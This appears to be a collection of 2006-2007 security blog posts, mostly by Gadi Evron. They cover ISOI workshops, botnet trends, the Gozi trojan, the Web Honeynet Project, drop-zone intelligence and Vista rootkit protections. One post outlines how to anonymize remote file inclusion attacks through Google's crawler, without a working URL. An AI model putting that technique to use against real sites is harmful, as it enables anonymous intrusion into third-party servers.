ISOI 3 is on, and Washington DC is hot

following up on that strange title, isoi 3 (internet security operations and intelligence), a workshop for do-ers who work on the security of the internet and its users, is happening monday and tuesday in washington, dc.

this time around we have even more government participation (we’re in dc, duh), but a bit less from academia (who can try and look at long term solutions), rather than just us security researchers, and operators (who respond, contain and mitigate incidents).

i am very pleased with our progress on encouraging global cooperation, and getting more industry information sharing going. i am also happy we are moving from “just” good-will based relationships to the physical world with our efforts, being able to take things to the next level with world-wide operational task forces and, indeed, affecting change.

if you are interested in this realm of internet security operations, take a look at isoi 3′s schedule, and perhaps submit something for the next workshop.

some reporters are somewhat annoyed that entrance is barred to them, but i hope they’d understand that although we make things public whenever we can as full disclosure is a strong weapon in the fight against cyber crime, folks can not share as openly when they have to be on their toes all the time.

the third isoi is here because after dhs ended up unable to host it, sponsors emerged who were happy to assist:

afilias ltd.:
the internet society:
shinkuro, inc.:

it’s going to be an interesting next week here at the swamp. atendees better show up with their two forms of id. :)

gadi evron,


CFP: ISOI III (a DA workshop)

cfp: isoi iii (a da workshop)


cfp information and current speakers below.

isoi 3 (internet security operations and intelligence) will be held in
washington dc this august the 27th, 28th.

this time around the folks at us-cert (department of homeland security -
dhs) are hosting. sunbelt software is running the after-party dinner.

we only have a partial agenda at this time (see below), but to remind you of what you will see, here are the previous ones:

if you haven’t rsvp’d yet, please do so soon. although we have 240 seats, we are running out of space.

a web page for isoi 3 can be found at:

27th, 28th august, 2007
washington dc -
aed conference center:

registration via is mandatory, no cost attached to attending. check if you apply for a seat in our web page.


this is the official cfp for isoi 3. main subjects include: fastflux, fraud, ddos, botnets. other subjects relating to internet security operations are also welcome.

some of our current speakers as you can see below lecture on anything from estonia’s “war” to current web 2.0 threats in-the-wild.

please email as soon as possible to submit a proposal. i will gather them and give them to our committee (jeff moss) for review.

current speakers (before committee decision)

roger thompson (exp labs
- google adwords .. .the dangers of dealing with the russian mafia

barry raveendran greene (cisco)
- what you should be asking me as a routing vendor

john lacour (mark monitor)
- vulnerabilities used to hack sites for phishing
- using xss to track phishers

dan hubbard (websense)
- mpack and honeyjax (web 2.0 honeypots)

april lorenzen
- fastflux: operational update

william salusky (aol)
- the spammer evolves – migration to webmail

hillar aarelaid (estonian cert)
- incident response during the recent attack

Sun Shine (beyond security)
- strategic lessons from the estonian “first internet war”

jose nazarijo (arbor)
- botnet statistics from the estonian attack

andrew fried (treasury department)
- phishing and the irs – new methods

danny mcpherson (arbor)
- tba


Malware went commerical

In a post by Brian Krebs in the Washington post, Brian describes how Virus (malware) makers have started to spend cash on buying sponsored links of high-profile keywords which get regularly visited by poorly patched people so that they can infect them with malwares.

One such high-profile keyword is the BBB, the Better Business Bureau, which as you would guess it most average joes would go to visit and will look for, while buying something like Slashdot won’t :) .

This of course is an interesting move, though not so much unexpected. I can see an “legit-company” coming soon, where a company of such malware distribution will have an R&D – create new malwares and find new vulnerabilities, Marketing – buy high profile keywords, or generally get people interested in your malware infected web site and Sales – sell bot nets and infected/hacked computers for money type of organizations.


Gozi Trojan analysis

SecureWorks have posted analysis of another Trojan that used to to steal SSL/TLS encrypted data transfered from the victimized PC.

A single attack by a single variant compromises more than 5200 hosts and 10,000 user accounts on hundreds of sites.

  • Steals SSL data using advanced Winsock2 functionality
  • State-of-the-art, modularized Trojan code
  • Spread through IE browser exploits
  • Undetected for weeks, months by many AV vendors
  • Customized server/database code to collect sensitive data
  • Customer interface for on-line purchases of stolen data
  • Accounts compromised by stealing data primarily from infected home PCs
  • Accounts at top financial, retail, health care, and government services affected
  • Data’s black market value at least $2 million

Full article is here.


MS OneCare last in anti-virus tests – what’s the future

Austrian AV Comparatives Web site tested 17 AV products – including several free anti-virus programs as well.
Link to the test:
(select ‘Comparatives’ and ‘On-demand comparative / February 2007′)

Microsoft’s Live OneCare was the only product receiving result under ‘Standard’ level and it detected only 82.4 percent of malware. There are many well known vendors with the result of 97.9 percent. And the winner received the result of 99.5 %.
OneCare’s detection of polymorphic viruses was poor as well, says the report.

This is not the only coverage test published, but AV Comparatives will release more similar tests later this year. We will see if the result will change.


Web Honeynet Project: announcement, exploit URLs this Wednesday

important note: the name of the web honeynet project has been changed to the web honeynet task force to avoid confusion with the honeynet project.

[ warning: this post includes links to live web server malware propagated this wednesday via file inclusions exploits. these links are not safe! ]


the newly formed web honeynet project from securiteam and the isotf will in the next few months announce research on real-world web server attacks which infect web servers with:
tools, connect-back shells, bots, downloaders, malware, etc. which are all cross-platform (for web servers) and currently exploited in the wild.

the web honeynet project will, for now, not deal with the regular sql injection and xss attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

these attacks form botnets constructed from web servers (mainly iis and apache on linux and windows servers) and transform hosting farms/colos to attackplatforms.

most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) php web applications, as is well known and established.

php (or scripting) shells, etc. have been known for a while, as well as file inclusion (or rfi) attacks, however, mostly as something secondary and not much (if any – save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

the bad guys currently exploit, create botnets and deface in a massive fashion and force isps and colos to combat an impossible situation where any (mainly) php application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.

what is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) – meaning aside for research, the web honeynet project will also release actionable data on offensive ip addresses, urls and on the tools themselves to be made availableto operational folks, so that they can mitigate the threat.

it’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. several folks (andquite loudly – me) have been warning about this for a while, now it’s time to take action instead of talk. :)

note: below you can find sample statistics on some of the web honeynet project information for this last wednesday, on file inclusion attacks seeding malware.
you will likely notice most of these have been taken care of by now.

the first research on the subject (after looking into several hundred such tools) will be made public on the february edition of the virus bulletin magazine, from:
kfir damari, noam rathaus and gadi evron (yours truly).

the securiteam and isotf web honeynet project is supported by beyond security ( )..

special thanks (so far) to: ryan carter, randy vaughn and the rest of the new members of the project.

for more information on the web honeynet project feel free to contact me.

also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

sample report and statistics (for wednesday the 10th of january, 2007):

ip | hit count | malware (count), … | | 12 | http://m (4),
http://m (6),
http://m (2), | 11 | http://w (more…)


Drop zones and an intelligence war

in this post ( ), fx describes a drop zone for a phishing/banking trojan horse, and how he got to it.

go fx. i will refrain from commenting on the report he describes from secure science, which i guess is a comment on its own.

we had the same thing happen twice before in 2006 (that is worth mentioning or can be, in public).

once with a very large “security intelligence” company giving drop zone data in a marketing attempt to get more bank clients (“hey buddy, why are 400 banks surfing to our drop zone?!?!)

twice with a guy at defcon showing a live drop zone, and the data analysis for it, asking for it to be taken down (it wasn’t until a week later during the same lecture at the first isoi workshop hosted by cisco). for this guy’s defense though, he was sharing information. in a time where nearly no one was aware of drop zones even though they have been happening for years, he shared data which was valuable commercially, openly, and allowed others to clue up on the threats.

did anyone ever consider this is an intelligence source, and take down not being exactly the smartest move?

it’s enough that the good guys all fight over the same information, and even the most experienced security professionals make mistakes that cost in millions of usd daily, but publishing drop zone ips publicly? that can only result in a lost intelligence source and the next one being, say, not so available.

i believe in public information and the harm of over-secrecy, i am however a very strong believer that some things are secrets for a reason. what can we expect though, when the security industry is 3 years behind and we in the industry are all a bunch of self-taught amateurs having fun with our latest discoveries.

at least we have responsible folks like fx around to take care of things when others screw up.

i got tired of being the bad guy calling “the king is naked”, at least in this case we can blame fx. :)

it’s an intelligence war people, and it is high time we got our act together.

i will raise this subject at the next isoi workshop hosted by microsoft
( ) and see what bright ideas we come up with.

gadi evron,


Botnets: a retrospective to 2006, and where we are headed in 2007

a few months back i released a post on where i think anti-botnets technology is heading. now it’s time for what happened in 2006, and what we can expect from here on.

i am not a believer in such retrospective looks, as often, they are completely biased and based on what we have seen and what we want to see. this is why i will try and limit myself to what we know happens and is likely to get attention, as well as what we have seen tried by bad guys, which is working for them enough to take to the next level.

what changed with botnets in 2006:

1.botnets reached a level where it is unclear today what parts of the internet are not compromised to an extent. count by clean rather than infected.
2. botnets have become the most significant platform from which virtually any type of online attack and crime are launched. botnets equal an online infrastructure for abusive or criminal activity online.
3. in the past year, botnets have become mainstream. from a not existent field even in the professional realm up to a few years ago, where attacks were happening constantly reagrdless, it has turned to the main buzzword and occupation of the security industry today, directly and indirectly.
4. websites have returned to being one the most significant form of infection for building botnets, which hadn’t been the case since the late 90s.
5. botnets have become the moving force behind organized crime online, with a low-risk high-profit calculation.
6. new technologies are finally being introduced, moving the botnet controllers from using just (or mainly) irc to more advanced c&c (command and control) channels such as p2p, or multi-layered, such as dns and irc on the osi model.
7. botnets used to be a game of quantity. today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in type of bot as well as in abilities.

what’s going to happen with botnets in 2007:

botnets won’t change. all will remain the same as it has been for years. awareness however, will increase making the problem appear larger and larger, perhaps approaching its real scale. the bad guys would utilize their infrastructure to get more out of the bots (quality once quantity is here) and be able to do more than just steal cash. maximizing their revenue.

further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering, to shame-less and open show of strength to those who oppose them (think blue security), in the real world as well as the cyber one (which to the mob is one and the same, it’s the income that speaks).

meaning, the existing botnets infrastructure will be utilized both in an open fashion, due to the fact online miscreants (real-world mob) face virtually no risk, as well as quiet and secretive uses for third-party intelligence operations.

gadi evron,


Internet Security Operations and Intelligence II

isoi 2 is finalized. the schedule and agenda can be found here:

i am going to do my best to release some of these presentation publically after the event (if the authors agree), but it is not likely.

some public feedback will be relayed from the workshop.

gadi evron,


Anonymizing RFI Attacks Through Google

google can be utilized to hack into websites – actively exploiting them (not information gathering by the use of “google hacking”, although that is how most of the sites vulnerable to rfi attacks are found).

by placing a url on any web page, google will find it, visit it and then index it. with this mechanism, it is possible to anonymize attacks on third party web sites through google by the use of its crawler.

poc -
a malicious web page is constructed by an attacker, containing a url built like so:
1. third party site uri to attack.
2. file inclusion exploit.
3. second uri containing a malicious php shell.

example url:

google will harvest this url, visit the site using its crawler and index it.
meaning accessing the target site with the url it was provided and exploiting it unwittingly for whoever planted it. it’s a feature, not a bug.

this is currently exploited in the wild. for example, try searching google for:

and note, as an example:
which is no longer vulnerable. the %20 seems out of place, but this is how it is shown in the search.

why use a botnet when one can abuse the google crawler, which is allowed on most web sites?

1. this attack was verified on google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. file inclusions seem to tie in well with this attack anonymizer, but there is no reason why others attack types can’t be used in a similar fashion.
3. the feature might also be used to anonymize communication, as a covert channel.

noam rathaus.
(with thanks to Sun Shine and lev toger)


Real life uses for vulnerabilities: [funsec] Haxdoor: UK Police Count 8, 500 Victims in Data Theft (So Far)

as can be seen in the quoted message below –

so, here we go. real-life uses for vulnerabilities.

below is an example of just one “drop-zone” server in the united states, which has “600 financial companies and banks”.

several gigs of data.

how do these things work?


More on Joanna Rutkowska Blue Pill and the New Vista

so, blue pill no longer works on vista. well, that’s too bad. after talking to a few friends of mine, i decided writing a bit more about this.

the main question following this news is: does that mean we are now secure?

the answer, plain and simple, is no.


1. there are other rootkit and trojan horse technologies.
2. this did not solve the problem, it just made sure a driver would have to be loaded to make it work. as a rootkit is being installed, i don’t see this as much of a set-back.

what it is a set-back for, is legitimate software development. as an example, a hex editor. the devlopers would have to create a driver for this purpose specifically. i can see how this can become an issue for a lot of the software out there which needs to access the drive. now they can’t.

a driver will be written and released for bad guys to use with their backdoor tools.

to quote joanna on this issue, from the same blog:

imagine a company wanting to release e.g. a disk editor. now, with the blocked write access to raw disk sectors from usermode, the company would have to provide their own custom, but 100% legal, kernel driver for allowing their, again 100% legal, application (disk editor), to access those disk sectors, right? of course, the disk editor’s auxiliary driver would have to be signed – after all it’s a legal driver, designed for legal purposes and ideally having neither implementation nor design bugs! but, on the other hand, there is nothing which could stop an attacker from “borrowing” such a signed driver and using it to perform the pagefile attack. the point here is, again, there is no bug in the driver, so there is no reason for revoking a signature of the driver. even if we discovered that such driver is actually used by some people to conduct the attack!

but it seems that ms actually decided to ignore those suggestions and implemented the easiest solution, ignoring the fact that it really doesn’t solve the problem…

gadi evron,


Joanna Rutkowska’s blue pill and Vista RC2

joanna just published a blog entry on this issue, and how her poc doesn’t work on the new vista release.

why, etc.

“it quickly turned out that our exploit doesn’t work anymore! the
reason: vista rc2 now blocks write-access to raw disk sectors for user
mode applications, even if they are executed with elevated administrative


(hat tip to elad efrat)


setSlice() exploitation in the wild – MASSIVE

exploit code is available:

sans diary:

and this is so massively exploited, it makes vml look cute. there’s a rootkit, some other malware, and haxdor! (a phishing trojan horse)

thanks to roger thompson at for first reporting it.


Identities Lost in Phishing

i just opened this discussion on the phishing mailing list. you are all invited to join in.

as i often comment, it is funny to me (not really but hold on) when people scream about this or that organization losing a laptop with 20k identities. what’s 20k?

obviously that is important, and speaks volumes of corporate security and of privacy issues. still, it is insignificant in a laughable fashion when compared to what’s being stolen daily online.

every day, millions of online identities and website credentials are lost. millions. every day. (more…)


Nifty social engineering

Hi folks,

This is an example of nifty social engineering, which is really quite funny… _unless_ you’re the one on the receiving end. Here’s how it works….

You’re surfing the web, and you find a video that you really want to watch, (no, not one of “those” videos… well, not necessarily anyway), but it says you have to install a codec. Codec stands for compressor/ decompressor and is used to make otherwise huge video files into a more manageable size. You install the codec, and maybe you see the video, and maybe you don’t, but guess what? You’ve been rootkitted! Now, on one level, that’s just the classic bait and switch/ trojan horse scenario, but the _details_ are quite interesting.

I was looking at just such an example today, and I was wondering, suspiciously, why would people give a codec away for free, so I went to the codec website, started looking around, and found of all things …. a EULA. In the EULA, we find that, despite all the references to needing a codec for Windows Media Player, there’s the following paragraph…. (more…)